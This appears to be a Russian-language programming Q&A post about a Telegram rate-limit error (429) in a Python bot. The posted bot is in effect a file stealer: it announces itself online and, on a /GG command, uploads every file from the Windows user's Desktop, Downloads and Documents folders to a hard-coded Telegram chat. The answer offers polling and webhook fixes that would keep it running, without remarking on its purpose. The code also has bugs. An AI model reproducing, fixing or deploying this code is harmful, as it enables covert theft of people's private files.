# Ошибка Python TG бот

Tags: python, telegram-bot

В коде по неведомой причине появляется ошибка тг бот должен присылать файлы как было вчера но теперь у меня все время не удачно. Вот ошибка:2021-10-02 08:58:42,421 (**init**.py:544 MainThread) ERROR - TeleBot: "A request to the Telegram API was unsuccessful. Error code: 429. Description: Too Many Requests: retry after 13"

```
import telebot
import requests
import os
import random
import sys
import cv2
import wave
import time
import smtplib
import sqlite3
import zipfile
from PIL import ImageGrab
from telebot import types
import shutil
import pyautogui as pg
import platform

token = '1231417141892478258914782184'
chat_id = '11241498149842'

bot = telebot.TeleBot(token)

requests.post(f"https://api.telegram.org/bot{token}/sendMessage?chat_id={chat_id}&text=Online")

@bot.message_handler(commands=['GG'])
def gg(message):
    bot.send_message(message.chat.id, "J")
    dirs = '\n'.join(os.listdir(path='C:\\Users\\' + os.getlogin() + '\\Desktop'))
    dirs1 = '\n'.join(os.listdir(path='C:\\Users\\' + os.getlogin() + '\\Downloads'))
    dirs2 = '\n'.join(os.listdir(path='C:\\Users\\' + os.getlogin() + '\\Documents'))
    
    f1 = open("log.txt", "w+")              
    for i1 in dirs:
        f1.write(i1 + "\n")
    f1.close()
    download1 = open("log.txt", "r")
    lst1 = download1.readlines()
    for k1 in lst1:
        try:
            download1 = open('C:\\Users\\' + os.getlogin() + '\\Desktop\\' + k1[:-1], "rb")
            bot.send_document(message.chat.id, download1)
        except:
            bot.send_message(message.chat.id, "Не удачно!")

    f2 = open("log2.txt", "w+")              
    for i2 in dirs1:
        f2.write(i2 + "\n")
    f2.close()
    download2 = open("log.txt", "r")
    lst2 = download2.readlines()
    for k2 in lst2:
        try:
            download2 = open('C:\\Users\\' + os.getlogin() + '\\Downloads\\' + k2[:-1], "rb")
            bot.send_document(message.chat.id, download2)
        except:
            bot.send_message(message.chat.id, "Не удачно!")

    f3 = open("log3.txt", "w+")              
    for i3 in dirs2:
        f3.write(i3 + "\n")
    f3.close()
    download3 = open("log3.txt", "r")
    lst3 = download3.readlines()
    for k3 in lst3:
        try:
            download3 = open('C:\\Users\\' + os.getlogin() + '\\Documents\\' + k3[:-1], "rb")
            bot.send_document(message.chat.id, download3)
        except:
            bot.send_message(message.chat.id, "Не удачно!")
 
bot.polling(none_stop=True, interval = 0)
```

Answer (score 0):

Превышен лимит запросов к API telegram.
https://developer.mozilla.org/ru/docs/Web/HTTP/Status/429
Судя по коду программы, ошибка может повториться. Рекомендую поменять интервал опроса серверов телеграм с 0 секунд, например, до 5 секунд. Бот будет отвечать медленнее, но ошибка может повториться с меньшей вероятностью.

```
bot.polling(none_stop=True, interval = 5)
```

P.S. а вообще, вместо запроса о новых сообщениях, лучше сделать, чтоб телеграм сам слал обновления, при помощи `webhook`.